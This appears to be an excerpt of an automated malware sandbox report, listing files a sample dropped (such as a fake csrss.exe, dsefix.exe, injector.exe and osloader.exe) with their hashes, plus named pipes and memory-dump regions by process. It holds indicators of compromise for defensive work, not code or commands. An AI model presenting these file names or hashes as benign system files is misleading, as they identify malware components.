MD52f29ebdaf7b3395ebdadb13f453177c7
SHA120913d2d3c145adf43af7f13108cd1eb974862ca
SHA2565d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708
SHA51227c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\pipe\crashpad_2620_GWQNVRFFXEMZMBBTMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeFilesize
94KB
MD5d98e78fd57db58a11f880b45bb659767
SHA1ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831
-
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeFilesize
281KB
MD5d98e33b66343e7c96158444127a117f6
SHA1bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA2565de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5
-
\Users\Admin\AppData\Local\Temp\csrss\patch.exeFilesize
1.7MB
MD513aaafe14eb60d6a718230e82c671d57
SHA1e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3
-
\Users\Admin\AppData\Local\Temp\dbghelp.dllFilesize
1.5MB
MD5f0616fa8bc54ece07e3107057f74e4db
SHA1b33995c4f9a004b7d806c4bb36040ee844781fca
SHA2566e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA51215242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
5.3MB
MD51afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
5.3MB
MD51afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exeFilesize
5.3MB
MD51afff8d5352aecef2ecd47ffa02d7f7d
SHA18b115b84efdb3a1b87f750d35822b2609e665bef
SHA256c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\osloader.exeFilesize
591KB
MD5e2f68dc7fbd6e0bf031ca3809a739346
SHA19c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA51226256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579
-
\Users\Admin\AppData\Local\Temp\symsrv.dllFilesize
163KB
MD55c399d34d8dc01741269ff1f1aca7554
SHA1e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA5128ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d
-
\Windows\rss\csrss.exeFilesize
4.5MB
MD52f29ebdaf7b3395ebdadb13f453177c7
SHA120913d2d3c145adf43af7f13108cd1eb974862ca
SHA2565d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708
SHA51227c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7
-
\Windows\rss\csrss.exeFilesize
4.5MB
MD52f29ebdaf7b3395ebdadb13f453177c7
SHA120913d2d3c145adf43af7f13108cd1eb974862ca
SHA2565d856f4c0a6a3d6a13cc4b0786328e49511923b3ca208d93010c8e6b122bc708
SHA51227c258f7f4f9add24666daadf62008bff00f224723623b0463a9d455254cfcbbbcda92488530dcb41a3fad0d688c15630e0d8eda3c6fce031db1a91fc9e03ce7
-
memory/572-92-0x0000000000000000-mapping.dmp
-
memory/692-102-0x0000000000000000-mapping.dmp
-
memory/776-129-0x0000000002484000-0x0000000002487000-memory.dmpFilesize
12KB
-
memory/776-131-0x0000000002484000-0x0000000002487000-memory.dmpFilesize
12KB
-
memory/776-128-0x000007FEED340000-0x000007FEEDE9D000-memory.dmpFilesize
11.4MB
-
memory/776-127-0x000007FEEDEA0000-0x000007FEEE8C3000-memory.dmpFilesize
10.1MB
-
memory/776-130-0x000000000248B000-0x00000000024AA000-memory.dmpFilesize
124KB
-
memory/776-133-0x000000000248B000-0x00000000024AA000-memory.dmpFilesize
124KB
-
memory/776-132-0x0000000002484000-0x0000000002487000-memory.dmpFilesize
12KB
-
memory/1520-55-0x00000000025F0000-0x0000000002A2C000-memory.dmpFilesize
4.2MB
-
memory/1520-58-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/1520-57-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/1520-54-0x00000000025F0000-0x0000000002A2C000-memory.dmpFilesize
4.2MB
-
memory/1520-56-0x0000000002A30000-0x0000000003356000-memory.dmpFilesize
9.1MB
-
memory/1800-82-0x0000000140000000-0x00000001405E8000-memory.dmpFilesize
5.9MB
-
memory/1940-100-0x0000000000000000-mapping.dmp
-
memory/2040-87-0x0000000000000000-mapping.dmp
-
memory/2272-69-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/2272-62-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/2272-59-0x0000000002600000-0x0000000002A3C000-memory.dmpFilesize
4.2MB
-
memory/2272-61-0x0000000002600000-0x0000000002A3C000-memory.dmpFilesize
4.2MB
-
memory/2448-60-0x0000000000000000-mapping.dmp
-
memory/2484-64-0x000007FEFBD01000-0x000007FEFBD03000-memory.dmpFilesize
8KB
-
memory/2484-63-0x0000000000000000-mapping.dmp
-
memory/2524-143-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/2524-67-0x0000000000000000-mapping.dmp
-
memory/2524-73-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/2524-70-0x0000000002660000-0x0000000002A9C000-memory.dmpFilesize
4.2MB
-
memory/2524-72-0x0000000002660000-0x0000000002A9C000-memory.dmpFilesize
4.2MB
-
memory/2524-81-0x0000000000400000-0x0000000000D41000-memory.dmpFilesize
9.3MB
-
memory/2588-93-0x0000000000000000-mapping.dmp
-
memory/2592-108-0x0000000000000000-mapping.dmp
-
memory/2616-135-0x00000000700D1000-0x00000000700D3000-memory.dmpFilesize
8KB
-
memory/2616-138-0x00000000710BD000-0x00000000710C8000-memory.dmpFilesize
44KB
-
memory/2616-141-0x00000000710BD000-0x00000000710C8000-memory.dmpFilesize
44KB
-
memory/2616-140-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2616-139-0x00000000710BD000-0x00000000710C8000-memory.dmpFilesize
44KB
-
memory/2616-137-0x0000000076321000-0x0000000076323000-memory.dmpFilesize
8KB
-
memory/2616-136-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/2616-134-0x0000000072651000-0x0000000072654000-memory.dmpFilesize
12KB
-
memory/2620-95-0x0000000000000000-mapping.dmp
-
memory/2692-91-0x0000000000000000-mapping.dmp
-
memory/2780-98-0x0000000000000000-mapping.dmp
-
memory/2784-99-0x0000000000000000-mapping.dmp
-
memory/2828-94-0x0000000000000000-mapping.dmp
-
memory/2836-97-0x0000000000000000-mapping.dmp
-
memory/2852-96-0x0000000000000000-mapping.dmp
-
memory/2936-88-0x0000000000000000-mapping.dmp
-
memory/2988-89-0x0000000000000000-mapping.dmp
-
memory/3000-90-0x0000000000000000-mapping.dmp